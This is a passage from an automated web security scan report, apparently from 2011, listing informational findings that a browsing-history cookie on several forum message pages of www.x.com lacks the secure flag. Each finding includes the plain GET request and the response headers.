<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.146. https://www.x.com/message/211738  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/211738

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/211738 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333235323b312c35333334333b312c35333331393b312c35333331323b312c35333037353b312c35333539323b312c35333437393b312c35333631303b312c35333631393b312c35333637393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105262 t=1313157515804148
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.147. https://www.x.com/message/212001  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212001

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212001 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333331323b312c35333334333b312c35333037353b312c35333331393b312c35333539323b312c35333437393b312c35333631303b312c35333631393b312c35333637393b312c35333632383b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=105378 t=1313157515407297
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.148. https://www.x.com/message/212124  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212124

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212124 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333331393b312c35333334333b312c35333539323b312c35333037353b312c35333437393b312c35333631303b312c35333631393b312c35333637393b312c35333632383b312c35333636373b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:35 GMT; Path=/
Vary: User-Agent
JP: D=62279 t=1313157514975703
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.149. https://www.x.com/message/212170  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212170

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212170 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333334333b312c35333539323b312c35333437393b312c35333037353b312c35333631303b312c35333631393b312c35333637393b312c35333632383b312c35333636373b312c34353633303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=97085 t=1313157514570063
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.150. https://www.x.com/message/212753  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212753

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212753 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333037353b312c35333437393b312c35333631303b312c35333539323b312c35333631393b312c35333637393b312c35333632383b312c35333636373b312c34353633303b312c35333638373b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:34 GMT; Path=/
Vary: User-Agent
JP: D=168395 t=1313157514196506
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.151. https://www.x.com/message/212906  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/212906

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/212906 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333437393b312c35333631303b312c35333631393b312c35333637393b312c35333539323b312c35333632383b312c35333636373b312c34353633303b312c35333638373b312c35333731303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:33 GMT; Path=/
Vary: User-Agent
JP: D=62986 t=1313157513210614
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.152. https://www.x.com/message/213354  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213354

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213354 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333539323b312c35333632383b312c35333631303b312c35333631393b312c35333637393b312c35333636373b312c34353633303b312c35333638373b312c35333731303b312c35333833383b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=113506 t=1313157512852345
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.153. https://www.x.com/message/213546  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213546

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213546 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333631303b312c34353633303b312c35333632383b312c35333636373b312c35333631393b312c35333637393b312c35333638373b312c35333731303b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:32 GMT; Path=/
Vary: User-Agent
JP: D=101383 t=1313157512015652
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.154. https://www.x.com/message/213568  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213568

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213568 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:31 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333631393b312c34353633303b312c35333632383b312c35333637393b312c35333636373b312c35333638373b312c35333731303b312c35333833383b312c35333839393b312c35333933353b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=61024 t=1313157511632200
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.155. https://www.x.com/message/213571  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213571

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213571 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333632383b312c34353633303b312c35333638373b312c35333636373b312c35333637393b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=67689 t=1313157511258036
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.156. https://www.x.com/message/213767  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213767

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213767 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333637393b312c35333638373b312c35333636373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:31 GMT; Path=/
Vary: User-Agent
JP: D=90276 t=1313157510953739
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.157. https://www.x.com/message/213787  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213787

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213787 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333636373b312c35333638373b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:30 GMT; Path=/
Vary: User-Agent
JP: D=78709 t=1313157510281228
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.158. https://www.x.com/message/213788  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213788

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213788 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:29 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333638373b312c35333833383b312c34353633303b312c35333731303b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=103606 t=1313157509903054
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.159. https://www.x.com/message/213865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/213865

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/213865 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c34353633303b312c35333731303b312c35333833383b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:29 GMT; Path=/
Vary: User-Agent
JP: D=179001 t=1313157509418868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.160. https://www.x.com/message/214347  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214347

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214347 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333833383b312c35333936313b312c35333933353b312c35333839393b312c35333731303b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:28 GMT; Path=/
Vary: User-Agent
JP: D=78567 t=1313157508050072
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.161. https://www.x.com/message/214440  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214440

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214440 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333731303b312c35333933353b312c35333936313b312c35333833383b312c35333839393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=115134 t=1313157507734977
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.162. https://www.x.com/message/214618  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214618

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214618 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333839393b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=71895 t=1313157507417708
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.163. https://www.x.com/message/214902  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214902

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214902 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333933353b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:27 GMT; Path=/
Vary: User-Agent
JP: D=61141 t=1313157507100954
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.164. https://www.x.com/message/214926  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/214926

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/214926 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:26 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333936313b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:26 GMT; Path=/
Vary: User-Agent
JP: D=86752 t=1313157506769901
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.165. https://www.x.com/message/215245  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215245

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /message/215245 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
